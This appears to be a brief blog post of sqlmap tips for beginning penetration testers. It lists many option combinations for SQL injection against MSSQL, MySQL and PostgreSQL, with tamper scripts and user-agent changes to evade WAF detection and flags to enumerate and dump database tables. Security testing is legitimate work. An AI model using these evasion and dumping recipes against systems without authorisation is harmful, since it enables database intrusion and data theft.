sqlmap ideas

Here are just some random things that i have figured out with this tool so far. In no way at all am I calling myself an expert with this tool. These are just a few humble tips I might haev for a beginning tester.

–random-agent — A nice little flag to add during a test. This prevents the default user agent from being used, so you will not get auto-flagged by a simple signature any WAF might have. In the source files you can find the list that the program uses, and alter it if you want to include others you might want to use, and maybe removing some if you so choose. (Remember if you do alter the file, your next update might over write your changes!)

--technique=E --dbms=MSSQL --os=Windows --level=5 --risk=3 --banner --is-dba --dbs --tables --flush-session
--technique=U --dbms=MSSQL --os=Windows --level=5 --risk=3 --banner --is-dba --dbs --tables --flush-session
--technique=S --dbms=MSSQL --os=Windows --level=5 --risk=3 --banner --is-dba --dbs --tables --flush-session
--technique=T --dbms=MSSQL --os=Windows --level=5 --risk=3 --banner --is-dba --dbs --tables --flush-session
--technique=T --dbms=MSSQL --os=Windows --level=5 --risk=3 -D <db_name> --tables

 

 --technique=U --dbms=MSSQL --os=Windows --level=5 --risk=3 --no-cast -D <db_name> --tables
 --technique=U --user-agent=Mozilla --dbms=MSSQL --os=Windows --level=5 --risk=3 --hex -D <db_name> -T <table_name> --columns
--technique=U --user-agent=Mozilla --dbms=MSSQL --os=Windows --level=5 --risk=3 --hex -D <db_name> -T <table_name> -C <column_name> --dump
--technique=U --user-agent=Mozilla --level=5 --risk=3 --hex --drop-set-cookie --flush-session --tamper=base64encode
--technique=B --level=5 --risk=3 --tamper=between,space2comment,space2dash --drop-set-cookie --flush-session --banner --is-dba --dbs --delay=1
--technique=E --dbms=MySQL --level=5 --risk=3 --tamper=space2dash,base64encode --random-agent --drop-set-cookie --flush-session --delay=1 --banner --is-dba --dbs
--technique=U --dbms=MySQL --level=5 --risk=3 --tamper=lowercase,space2dash,base64encode --drop-set-cookie --flush-session --banner --is-dba --dbs --delay=1
--technique=S --dbms=MySQL --flush-session --level=5 --risk=3 --tamper=between,randomcase,space2comment --random-agent --drop-set-cookie --flush-session --banner --is-dba --dbs --time-sec=2
--technique=S --dbms=PostgreSQL --flush-session --level=5 --risk=3 --tamper=between,randomcase,space2comment --random-agent --drop-set-cookie --flush-session --banner --is-dba --dbs --time-sec=2 --check-waf --identify-waf --exclude-sysdbs
--dbms=MySQL --level=5 --risk=3 --tamper=space2dash,base64encode --random-agent --drop-set-cookie --flush-session --banner --is-dba --dbs --check-waf --identify-waf --exclude-sysdbs --time-sec=2 --delay=1
--technique=E --level=5 --risk=3 --tamper=space2dash,base64encode --random-agent --drop-set-cookie --flush-session --banner --is-dba --dbs --check-waf --identify-waf --exclude-sysdbs --time-sec=2 --delay=1
--technique=BEUS --flush-session --level=5 --risk=3 --tamper=between,randomcase,space2comment --random-agent --drop-set-cookie --flush-session --banner --is-dba --dbs --time-sec=2
--technique=BEUS --flush-session --level=5 --risk=3 --tamper=between,randomcase,bluecoat --random-agent --drop-set-cookie --flush-session --banner --is-dba --dbs --time-sec=2
 --technique=B --dbms=mysql --level=5 --risk=3 --hex --drop-set-cookie --flush-session --tamper=base64encode --random-agent --check-waf --identify-waf --exclude-sysdbs --batch --time-sec=2
--technique=U --dbms=mysql --level=5 --risk=3 --hex --drop-set-cookie --flush-session --tamper=between,randomcase,base64encode --random-agent --check-waf --identify-waf --exclude-sysdbs --batch
--technique=EB --level=5 --risk=3 --hex --drop-set-cookie --flush-session --tamper=between,randomcase,base64encode --random-agent --check-waf --identify-waf --exclude-sysdbs
--technique=EB --level=5 --risk=3 --hex --drop-set-cookie --flush-session --tamper=between,randomcase,base64encode --random-agent --check-waf --identify-waf --exclude-sysdbs
--dbms=MySQL --os=Linux --technique=S --level=5 --risk=3 --tamper=randomcase,appendnullbyte --drop-set-cookie --flush-session --banner --is-dba --dbs --delay=1 --random-agent --batch